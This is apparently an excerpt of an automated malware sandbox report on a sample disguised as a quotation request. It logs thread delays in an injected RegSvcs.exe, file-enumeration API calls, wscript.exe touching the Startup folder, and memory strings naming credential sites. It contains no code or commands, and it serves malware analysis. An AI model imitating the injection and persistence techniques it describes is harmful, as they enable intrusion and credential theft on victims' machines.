                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596884
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596231
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595216
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594559
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594444
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594032
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598956
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598390
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597515
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597405
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597296
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596391
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595923
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595577
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594265
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7129
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7441
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2398
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe API coverage: 3.5 %
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe API coverage: 3.8 %
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F4C2A2 FindFirstFileExW,1_2_00F4C2A2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F868EE FindFirstFileW,FindClose,1_2_00F868EE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00F8698F
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D076
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D3A9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F89642
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F8979D
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F7DBBE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00F89B2B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00F85C97
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00D9C2A2 FindFirstFileExW,2_2_00D9C2A2
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD68EE FindFirstFileW,FindClose,2_2_00DD68EE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00DD698F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD076
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD3A9
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD9642
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD979D
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DCDBBE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00DD9B2B
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exe Code function: 2_2_00DD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00DD5C97
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe Code function: 1_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00F142DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596231
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598956
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594265
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 00000009.00000002.2615772081.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
